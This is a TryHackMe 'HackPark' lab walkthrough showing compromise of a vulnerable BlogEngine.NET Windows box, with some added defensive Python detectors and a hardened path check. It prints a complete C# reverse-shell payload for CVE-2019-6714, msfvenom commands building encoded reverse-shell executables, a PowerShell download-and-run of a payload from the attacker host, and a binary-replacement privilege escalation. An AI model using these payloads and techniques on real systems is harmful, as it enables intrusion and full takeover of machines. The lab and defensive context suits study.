HackPark | TryHackMe Walkthrough

Bishal Ray -#GxbNt
6 min read · Oct 28, 2023


About the Machine

HackPark is a medium-difficulty room on TryHackMe. In the initial stage, a login page vulnerable to CVE-2019-6714 is discovered, which provides RCE. Once inside the machine and after enumeration with winPEAS, weak service file permissions are found on SystemScheduler. Unusual files exist within the SystemScheduler directory, including a log file. Reading the log file shows that a Message.exe file runs every 30 seconds. Replacing the original Message.exe with a malicious Message.exe therefore yields a reverse shell as the Administrator user.

Enumeration

nmap -Pn -sC -sV -sS -p- 10.10.101.115

Port 80 (HTTP) and port 3389 (RDP) were found to be open. Enumeration of port 80 was started to look for useful information.

http://10.10.101.115/Account/login.aspx?ReturnURL=/admin/

Port 80 hosted a web page with a menu bar on the right side. The menu bar contained a login entry, which redirected to a login page.

Many default login credentials were attempted, but they did not work. I started to brute force the login using Burp Suite.

The login request was captured using Burp Suite, and the request was sent to Intruder. The “Sniper” attack type was selected, focusing on the password field for the attack.

After initiating the attack, I filtered the results based on their length and identified a single result with a different length. Upon inspecting the responses, it was observed that this particular result was redirecting to “/admin/”. Therefore, I used the identified credentials to attempt a login.
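Seen from the server side, the same burst is easy to spot. As an added example (not part of the original walkthrough), the detector below runs over constructed IIS W3C log lines, flags a client that POSTs repeatedly to /Account/login.aspx inside a short window, and picks out the attempt that finally got the 302 redirect to /admin/. The field layout, window and threshold are assumptions.

```python
"""Detect a login brute-force burst against BlogEngine's login page in IIS
W3C logs and pick out the guess that succeeded (302 redirect to /admin/).
Added example, not part of the walkthrough; sample lines are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"

# Constructed sample: repeated POSTs re-render the form (200) until one guess
# is accepted and redirects (302); a second client logs in normally once.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2023-10-28 10:00:01 GET /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 200
2023-10-28 10:00:05 POST /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 200
2023-10-28 10:00:05 POST /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 200
2023-10-28 10:00:06 POST /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 200
2023-10-28 10:00:06 POST /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 200
2023-10-28 10:00:07 POST /Account/login.aspx ReturnURL=/admin/ 10.17.58.44 302
2023-10-28 10:00:08 GET /admin/ - 10.17.58.44 200
2023-10-28 10:05:00 POST /Account/login.aspx ReturnURL=/admin/ 10.0.0.7 302
"""

def parse_iis(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_login_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: {"attempts": n, "success_at": "time or None"}} for
    clients that POSTed to the login page >= threshold times inside `window`."""
    posts = defaultdict(list)
    for rec in parse_iis(text):
        if rec["cs-method"] == "POST" and rec["cs-uri-stem"].lower() == LOGIN_PATH:
            when = datetime.strptime(f'{rec["date"]} {rec["time"]}', "%Y-%m-%d %H:%M:%S")
            posts[rec["c-ip"]].append((when, rec["sc-status"]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            burst = [e for e in events[i:] if e[0] - start <= window]
            if len(burst) >= threshold:
                first_ok = next((t for t, s in burst if s == "302"), None)
                alerts[ip] = {"attempts": len(burst),
                              "success_at": str(first_ok) if first_ok else None}
                break
    return alerts
```

The single legitimate 302 from 10.0.0.7 is not flagged; only the client whose burst crosses the threshold is, together with the time its guess was accepted.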

Username: admin
Password: 1qaz2wsx

I successfully logged in with the obtained credentials, and a dashboard appeared after the login.

While navigating to the “About” options, I found the version of the site, which was using BlogEngine version 3.3.6.0. I began searching for vulnerabilities related to that specific version.

BlogEngine.NET 3.3.6 was found to be vulnerable to a path traversal flaw that can lead to remote code execution. The flaw affects BlogEngine.NET 3.3.6 and earlier and stems from an unchecked “theme” parameter: it can be manipulated to override the theme used to render blog pages, which is what allows malicious code to be executed.

CVE-2019-6714 has been assigned to this vulnerability in BlogEngine.NET 3.3.6, documenting and tracking it as a known security issue.
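The root cause is the theme value being joined straight into a file path. As an added example (not BlogEngine.NET's code), the block below shows that flawed pattern next to a hardened version that accepts only installed theme names and verifies the resolved path stays under the themes directory. THEMES_ROOT, the allow-list and the control file name are assumptions.

```python
"""Vulnerable vs. hardened handling of a user-supplied theme name, modelled on
the unchecked 'theme' parameter behind CVE-2019-6714. Added example, not
BlogEngine.NET code; THEMES_ROOT, the allow-list and file names are assumed."""
import posixpath

THEMES_ROOT = "/inetpub/wwwroot/Custom/Themes"   # assumed web-root layout
INSTALLED_THEMES = {"Standard", "Dark"}           # assumed allow-list of themes
CONTROL = "PostView.ascx"                         # assumed name of the theme control

def is_inside(root, path):
    """Containment check: True when `path` resolves to root or a child of it."""
    root = posixpath.normpath(root)
    path = posixpath.normpath(path)
    return posixpath.commonpath([root, path]) == root

def theme_control_path_vulnerable(theme):
    """Mirror of the flawed pattern: the parameter is concatenated straight into
    the path, so a value such as '../../App_Data/files' leaves the themes tree
    and the control is loaded from wherever the traversal points."""
    return posixpath.normpath(f"{THEMES_ROOT}/{theme}/{CONTROL}")

def theme_control_path_hardened(theme):
    """Accept only an installed theme name, then double-check that the resolved
    path is still under THEMES_ROOT before handing it to the control loader."""
    if theme not in INSTALLED_THEMES:
        raise ValueError(f"unknown theme: {theme!r}")
    path = posixpath.normpath(f"{THEMES_ROOT}/{theme}/{CONTROL}")
    if not is_inside(THEMES_ROOT, path):       # defence in depth behind the allow-list
        raise ValueError("theme path escapes the themes directory")
    return path
```

The allow-list is the real fix; the containment check is kept so that a future theme name containing separators still cannot escape the directory.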

<script runat="server">
    // Server-side C# block: connects back to <IP>:4445, starts cmd.exe and
    // bridges the socket to the process's standard input and output.
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("<IP>", 4445)) {
            using (System.IO.Stream stream = client.GetStream()) {
                using (System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    // cmd.exe with all standard streams redirected and no window
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    // Read one line from the socket, pass it to cmd.exe, repeat
                    while (true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    // Each line cmd.exe prints is written back to the socket
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>

After studying CVE-2019-6714, it was used to execute a reverse shell on the target system, which gave remote access to and control over the machine.

A reverse shell was successfully obtained.

The netcat session was a little unstable, so a second payload was generated with msfvenom to obtain a Meterpreter shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.58.44 LPORT=1234 -e x86/shikata_ga_nai -f exe -o reverse.exe

Generating a reverse shell payload with msfvenom.

msfconsole -q 
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <our local ip>
set LPORT <Listener_port>
run

A listener was started in msfconsole.

python3 -m http.server 80

Starting a Python HTTP server in the directory where the payload was generated, so it can be transferred to the target machine.

cd C:\Windows\Temp
powershell -c wget "http://<IP_of_VPN/IP>/reverse.exe" -outfile "reverse.exe"

Navigating to the Temp directory on the target and downloading the payload from the attacker machine.

reverse.exe

Running the payload by entering its file name, which returns a Meterpreter session to the handler.

sysinfo

Executing the Meterpreter sysinfo command to check the architecture of the target host.

upload <path of winPeas>

Uploading the WinPEAS enumeration executable using the Meterpreter upload command.

shell
winPEASx64.exe

Dropping into a normal CMD shell and executing WinPEAS.

AutoLogon credentials were found, which could be used to log in over RDP (port 3389).

A service with weak service file permissions (SystemScheduler) was identified, which could be used to escalate privileges.

cd C:\Program Files (x86)\SystemScheduler

Navigating to the installation directory of SystemScheduler.

cd Events

Navigating to the Events folder, which looks unusual.

type 20198415519.INI_LOG.txt

Based on the log file, it looks like Message.exe runs every 30 seconds.

Navigating back to the SystemScheduler folder to find the Message.exe file.

Privilege Escalation

The next step is to generate a payload using msfvenom.

msfvenom -p windows/shell_reverse_tcp --encoder x86/shikata_ga_nai LHOST=<VPN_IP/IP> LPORT=4444 -f exe > Message.exe
mv Message.exe message1.exe
upload <path of vulnerable Message.exe file>

Renaming the original Message.exe on the target (Meterpreter's mv) and uploading the malicious Message.exe created above in its place.

Once the system runs the Message.exe file, a callback is received as the Administrator user.
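The weakness behind this escalation is a scheduled binary that non-administrators can overwrite. As an added example (not winPEAS or SystemScheduler code), the block below parses constructed icacls output for the two SystemScheduler executables and flags any file where Everyone, Users or Authenticated Users hold a write right; the ACL lines are constructed to mirror the weakness above, not copied from the box.

```python
"""Flag executables that low-privileged principals can overwrite, parsed from
icacls output. Added example (not winPEAS code); the icacls lines are constructed
to mirror the SystemScheduler weakness above, not copied from the box."""
import re

# Constructed icacls output: the first line of each file carries the path plus
# the first ACE; continuation lines are indented and carry one ACE each.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\SystemScheduler\Message.exe BUILTIN\Users:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
C:\Program Files (x86)\SystemScheduler\WScheduler.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                      BUILTIN\Administrators:(I)(F)
                                                      BUILTIN\Users:(I)(RX)
"""

LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users"}
WRITE_RIGHTS = {"F", "M", "W", "WD"}  # full, modify, write, write-data
# An ACE is "principal:(flag)(flag)..." where the principal may contain spaces
# but starts at the line start or after whitespace, and holds no ':' or '\'.
ACE_RE = re.compile(
    r"(?:^|(?<=\s))(?P<who>[^:\\\s][^:\\]*(?:\\[^:\\]+)?):(?P<flags>(?:\([^)]*\))+)\s*$")

def parse_icacls(text):
    """Return {path: [(principal, {right, ...}), ...]}."""
    acls, path = {}, None
    for raw in text.splitlines():
        m = ACE_RE.search(raw.rstrip())
        if not m:
            continue
        if not raw[:1].isspace():           # first line of a file: path precedes the ACE
            path = raw[:m.start()].rstrip()
            acls[path] = []
        if path is None:
            continue
        rights = {r for grp in re.findall(r"\(([^)]*)\)", m.group("flags"))
                  for r in grp.split(",")}
        acls[path].append((m.group("who"), rights))
    return acls

def writable_by_low_priv(text):
    """Paths where Everyone, Users or Authenticated Users hold a write right."""
    hits = []
    for path, aces in parse_icacls(text).items():
        for who, rights in aces:
            if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS:
                hits.append((path, who, sorted(rights & WRITE_RIGHTS)))
    return hits
```

Message.exe is reported because BUILTIN\Users holds (F); WScheduler.exe is not, since Users only hold (RX) on it.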

cd C:\Users\jeff\Desktop

With elevated privileges, the desktop of the user Jeff could be read and the user flag obtained.

cd c:\Users\Administrator\Desktop

Navigating to the Administrator desktop gives the root flag.
